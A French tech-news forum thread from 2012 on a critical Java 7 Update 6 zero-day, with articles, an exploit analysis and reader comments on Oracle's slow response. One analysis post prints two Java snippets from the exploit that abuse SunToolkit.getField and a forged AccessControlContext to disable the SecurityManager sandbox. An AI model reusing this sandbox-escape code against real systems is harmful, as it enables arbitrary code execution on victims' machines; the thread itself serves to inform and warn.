Faille de sécurité critique dans Java 7 Update 6

**Hinault Romaric** · 28/08/2012, 11h31

Faille de sécurité critique dans Java 7 Update 6
pouvant être utilisée pour installer des malwares, la désactivation de la plateforme recommandée

Les experts en sécurité tirent la sonnette d’alarme pour la dernière version de la plateforme Java. Java 7 Update 6 serait sujet à une vulnérabilité activement exploitée.

Les chercheurs en sécurité du cabinet FireEye ont découvert une faille de sécurité dans la plateforme pouvant être exploitée pour infecter des ordinateurs avec des logiciels malveillants. La vulnérabilité aurait été utilisée pour installer à distance le cheval de Troie Poison Ivy, qui a été utilisé dans le passé dans de nombreuses campagnes de cyberespionnage.

Les experts en sécurité ont classé cette vulnérabilité comme extrêmement critique, car elle permet l’exécution de code arbitraire sur les systèmes vulnérables sans l’intervention de l’utilisateur.

Les risques d’attaques par des pirates sont élevés d’autant plus qu’une preuve de faisabilité (PoC) aurait déjà été publiée sur Internet. Le PoC aurait même été utilisé pour créer un autre exploit pour une utilisation avec le Framework de test populaire Metasploit.

L’exploit pour Metasploit a été testé avec succès sur la mise à jour Java 7 Update 6, en utilisant différents navigateurs et systèmes d’exploitation dont Firefox sur Ubuntu 10.04, Internet Explorer, Chrome et Firefox sur Windows XP, Vista et Windows 7, Firefox et Safari sur Mac OS X 10.7.4.

Oracle n’a pas encore publié de commentaire concernant cette faille ou annoncé une date pour la sortie d’un correctif de sécurité. Selon le calendrier de l’éditeur, une mise à jour de la plateforme Java est prévue pour mi-octobre.

Pour l’instant, il est vivement conseillé aux utilisateurs de cette version de Java de désactiver complètement la plateforme, jusqu’à ce qu’un correctif soit disponible.

La vulnérabilité affecte uniquement le JRE (Java Runtime Environment) 1.7 qui contient Java 7 Update 6. Les versions 1.6 et antérieures du JRE ne sont pas concernées.

Source : Secunia, FireEye, Rapid7

Et vous ?

Utilisez-vous Java 7 Update 6 ? Que pensez-vous de cette faille ?

**tchize_** · 28/08/2012, 12h00

mi-octobre, y a pas a dire, toujours aussi rapide sur les patchs de sécurité chez oracle

Il serait peut-être utile de préciser que le problème est lié aux applets. Il ne faut pas virer non plus complètement java de sa machine, juste désactiver applets et, je suppose, webstart.

**Crazyfaboo** · 28/08/2012, 14h02

Envoyé par tchize_

mi-octobre, y a pas a dire, toujours aussi rapide sur les patchs de sécurité chez oracle

Microsoft fait normalement une MAJ le Mardi toutes les deux semaines... C'est mieux, certes, mais ils ont également beaucoup plus de choses à mettre à jour...

Envoyé par Dynamès

Mi-octobre alors qu'une énorme faille est signalé, faut quand même pas abusé là...

+

Envoyé par Hinault Romaric

Oracle n’a pas encore publié de commentaire concernant cette faille ou annoncé une date pour la sortie d’un correctif de sécurité.

Ca veut juste dire qu'Oracle n'a pas répondu. Rien ne dit qu'il n'y aura pas un patch d'urgence si cette faille est aussi critique que ce qu'il y parait.
Microsoft a déjà cassé plusieurs fois son calendrier pour publier des patchs critiques. J'espère qu'Oracle le fera aussi. Pour l'instant, on ne sait tout simplement pas. A noter qu'Oracle a déjà fait des Critical Patch update il y a peu de temps...

Envoyé par Dynamès

Bon, heureusement je suis encore en java update 5.

Pas sûr. La faille peut avoir été découverte pour l'update 6 et non testée encore pour l'update 5...

**Dynamès** · 28/08/2012, 14h06

Pas sûr. La faille peut avoir été découverte pour l'update 6 et non testée encore pour l'update 5...

Oui, mais ayant découvert cette faille pour l'update 6, ils ont surement voulu savoir ce qu'il en était pour les update précédents avant de dire"telle et telle version est vulnérable" non?

Ca veut juste dire qu'Oracle n'a pas répondu. Rien ne dit qu'il n'y aura pas un patch d'urgence si cette faille est aussi critique que ce qu'il y parait.
Microsoft a déjà cassé plusieurs fois son calendrier pour publier des patchs critiques. J'espère qu'Oracle le fera aussi. Pour l'instant, on ne sait tout simplement pas. A noter qu'Oracle a déjà fait des Critical Patch update il y a peu de temps...

Oui c'est vrai tu as raison de me le faire remarquer. N'allons pas trop vite en besogne en ce qui concerne les réactions d'oracle.

**Crazyfaboo** · 28/08/2012, 14h14

Envoyé par Dynamès

Oui, mais ayant découvert cette faille pour l'update 6, ils ont surement voulu savoir ce qu'il en était pour les update précédents avant de dire"telle et telle version est vulnérable" non?

On peut supposer que oui... mais encore une fois, pas sûr tant que c'est pas écrit quelque part noir sur blanc (ou rouge sur noir, vert sur marron, peu importe ^^).

Le plus simple serait que tu testes ta version de Java 7 (u5 donc) avec metasploit. Là, on serait vraiment fixé !

**JoeChip** · 28/08/2012, 15h10

Sinon en principe, si on n'exécute pas des trucs suspects, et qu'on ne compte pas uniquement sur la sécurité de la JVM, le risque semble limité non ? Enfin, je veux dire, comme d'hab quoi ...?

**Uther** · 28/08/2012, 14h11

Envoyé par tchize_

mi-octobre, y a pas a dire, toujours aussi rapide sur les patchs de sécurité chez oracle

Il s'agit du calendrier planifié des mises à jour. Vu la gravité de la faille, ça m'étonnerait qu'il attendent jusque là pour faire un correctif.

**Dynamès** · 28/08/2012, 13h56

Bon, heureusement je suis encore en java update 5.

Mais si j'avais eu la proposition de maj avant de voir cette information, j'aurais sans doute validé cette maj...

Mi-octobre alors qu'une énorme faille est signalé, faut quand même pas abusé là...

**tarikbenmerar** · 29/08/2012, 19h08

Le nouvel exploit zero-day de Java 7 décortiqué
Il permet de désactiver le sandbox avec une facilité déconcertante

Le grave exploit 0Day révélé au grand jour ce week-end (lire ci-devant) fait l'objet d'analyses approfondies de la part d'experts en sécurité.

L'analyse de Michael Schierl, traqueur récidiviste de vulnérabilités Java, met l'index sur une faille de sécurité dans l'implémentation de la méthode .execute() de la classe Expression. L'exploit n'utilise en aucun cas du bytecode, il n'est, en somme, pas très sophistiqué, mais reste difficile à détecter.

L'exploit utilise la classe sun.awt.SunToolkit pour désactiver le SecurityManager et par conséquent le sandbox de Java. Il ouvre ainsi le champ vers une liberté totale sur le système.

Pour mieux comprendre, il faut savoir que cette classe propose une méthode nommée getField(), qui donne accès, en lecture et écriture, aux attributs privés d'autres classes.

En principe, un code ne peut accéder à ces attributs, mais la nouvelle méthode .execute() de la classe Expression introduite dans Java 7 souffre d'un bug, qui expose dangereusement la méthode getField(). Dès lors, un code pareil peut faire des ravages :

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
4
5
6
7
8
9
10
11
12
13
private void SetField(Class paramClass, 
                      String paramString,
                      Object paramObject1, 
                      Object paramObject2) throws Throwable
{ 
  Object arrayOfObject  = new Object[2]; 
  arrayOfObject[0] = paramClass;
  arrayOfObject[1] = paramString;
  Expression localExpression = new Expression(GetClass("sun.awt.SunToolkit"),
                                                  "getField", arrayOfObject);
  localExpression.execute();
  ((Field)localExpression.getValue()).set(paramObject1, paramObject2);
}

À partir de ce bout de code, on peut désactiver le sandbox en appelant System.setSecurityManager(null). Pour cela, l'exploit crée un objet Statement pour appeler cette méthode.

Néanmoins, un appel direct n'est pas permis, et sera considéré comme non sûr.
Pour contourner cette restriction, un objet AccessControlContext est créé en premier qui représente en fait une classe démarrée à partir du disque dur local, et bénéficie ainsi de tous les droits d'accès.

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
4
5
6
7
8
9
10
11
12
13
public void disableSecurity() 
    throws Throwable 
{ 
  Statement localStatement = new Statement(System.class, "setSecurityManager", new Object[1]); 
  Permissions localPermissions = new Permissions(); 
  localPermissions.add(new AllPermission()); 
  ProtectionDomain localProtectionDomain = new ProtectionDomain( 
    new CodeSource(new URL("file:///"), new Certificate[0]), localPermissions); 
  AccessControlContext localAccessControlContext = 
    new AccessControlContext(new ProtectionDomain{localProtectionDomain}); 
  SetField(Statement.class, "acc", localStatement, localAccessControlContext); 
  localStatement.execute(); 
}

Oracle n'a pas encore annoncé la sortie d'un correctif. Java 7 Update 6 est la dernière version téléchargeable. Toutes les mises à jour de Java 7 souffrent de cette même vulnérabilité.

Ainsi, on préconise de carrément désactiver le plug-in Java du navigateur, sous peine, d'ouvrir une brèche que des malwares n'hésiteront pas à exploiter.

Source : le code de l'exploit

Et vous ?

Oracle réagira-t-il assez vite pour éviter une catastrophe virale ?

Quel est le vrai potentiel d'un tel exploit ?

Les IDS et les antivirus seront-ils suffisants ?

**tchize_** · 29/08/2012, 22h29

a pleurer. En gros on a un securityManager, et derrière on a awt, qui a des droits privilégiés sur le securitymanager, et qui en fait profiter celui qui veux

**Crazyfaboo** · 30/08/2012, 00h42

WTF (Ouate 2 phoque) !!!
Juste… sur le cul… !!

**Hinault Romaric** · 30/08/2012, 14h18

Faille de sécurité critique dans Java 7
Oracle informé depuis avril 2012

Mise à jour du 30/08/2012

Depuis le début de cette semaine, l’écosystème Java est secoué par une faille de sécurité critique pouvant être exploitée pour installer des logiciels malveillants (lire ci-devant).

La vulnérabilité qui touche la version 1.7.x du JRE (Java Runtime Environment), peut être utilisée pour désactiver le SecurityManager et par conséquent le sandbox de Java pour exécuter du code arbitraire sur les systèmes vulnérables sans l’intervention de l’utilisateur.

Les experts en sécurité ont fait écho de cette faille après des analyses approfondies, révélant les systèmes d’exploitation touchés, les potentiels risques, les preuves de réalisation, etc.

Mais jusqu’ici, malgré tout ce remue-ménage, Oracle fait la sourde oreille et n’a encore publié aucun avis de sécurité ou annoncé une date pour une mise à jour. Ce qui parait le plus surprenant est qu’il semblerait que la société soit au courant de cette faille depuis avril 2012.

Le cabinet polonais Security Explorations avait publié un avertissement depuis le 2 avril 2012 et aurait informé Oracle, qui ne prendra même pas la peine de référencer le problème dans son bulletin d’alerte de sécurité.

Jusqu’ici, la page qui traite des questions de sécurité de la firme annonce la prochaine mise à jour de Java SE pour le 16 octobre 2012. Plus qu’à espérer que d’ici là, un correctif d’urgence soit publié.

Pour l’instant, les utilisateurs n’ont que comme alternative la désactivation du plug-in Java dans leur navigateur. Pour rappel, la faille touche Firefox sur Ubuntu 10.04, Internet Explorer, Chrome et Firefox sur Windows XP, Vista et Windows 7, Firefox et Safari sur Mac OS X 10.7.4.

Source : Avertissement de Security Explorations, Alerte d'Oracle sur la faille

Et vous ?

Que pensez-vous de l’attitude d'Oracle ?

**Gugelhupf** · 30/08/2012, 14h28

Des fois je suis surpris de lire des articles comme celui-ci, je me dis que nous sommes peut-être quelques milliers d'informaticiens à lire ces infos et qu'il doit y avoir des centaines de milliers d'autres personnes qui n'en seront jamais au courant et qui seront peut-être affectés.

Je ne comprend pas trop cette haine des plugins et l'émerveillement devant le javascript. Ce vieux langage pourris des années 90 que personne voulait utiliser.
Toutes ces années de recherches sur les Langages pour finalement imposer Javascript comme langage universel

Pour moi JavaScript n'est pas un langage très au point, mais je pense que les gens préfèrent rester avec cela et utiliser des frameworks cache-misère (qui avouons le sont très pratiques pour développer) que d'apprendre un énième nouveau langage.

**thelvin** · 30/08/2012, 14h47

Envoyé par Gugelhupf

Des fois je suis surpris de lire des articles comme celui-ci, je me dis que nous sommes peut-être quelques milliers d'informaticiens à lire ces infos et qu'il doit y avoir des centaines de milliers d'autres personnes qui n'en seront jamais au courant et qui seront peut-être affectés.

C'est pour ça que Firefox se permet de désactiver des plugins de temps en temps, en demandant à peine l'avis de la personne mal informée. On peut en dire ce qu'on veut en terme de comportement politique, en attendant c'est une sécurité accessible à tout le monde.

Envoyé par Gugelhupf

Pour moi JavaScript n'est pas un langage très au point, mais je pense que les gens préfèrent rester avec cela et utiliser des frameworks cache-misère (qui avouons le sont très pratiques pour développer) que d'apprendre un énième nouveau langage.

Spas un nouveau langage à apprendre, s't'un nouveau langage à adapter, sécuriser, accélérer, intégrer, déployer. Pas la même chose.

**Freem** · 30/08/2012, 16h24

Et sinon... je sais que java a tendance à être installé par défaut sur nombre de machines, mais... vous en avez beaucoup vous, en tant qu'utilisateurs, des applications java? Ou vous en voyez beaucoup des applets java sur le net?

Quand j'y pense vraiment, je me dis qu'aucune machine parmi celles que j'utilise actuellement n'utilise java... Alors à part les terminaux mobiles d'android, qu'est-ce qui est réellement affecté?

Quand on dit "faut pas désinstaller java pour si peu" ok, mais... désinstaller les logiciels dont on ne se sert pas est aussi un élément de sécurité. Et je me demande vraiment si JAVA sert tant que ça... p'tet en entreprise avec les logiciels internes?

En tout cas, chapeau oracle pour la réactivité... plus de 4 mois sans corriger une faille d'une telle criticité, c'est impressionnant.

**JoeChip** · 30/08/2012, 16h42

Entendu parler de Minecraft...?

**guidav** · 30/08/2012, 17h54

Envoyé par Freem

Et sinon... je sais que java a tendance à être installé par défaut sur nombre de machines, mais... vous en avez beaucoup vous, en tant qu'utilisateurs, des applications java? Ou vous en voyez beaucoup des applets java sur le net?

La déclaration d'impôts en France, non ?

Sinon, il y a pas mal d'applis internes qui sont développées en java.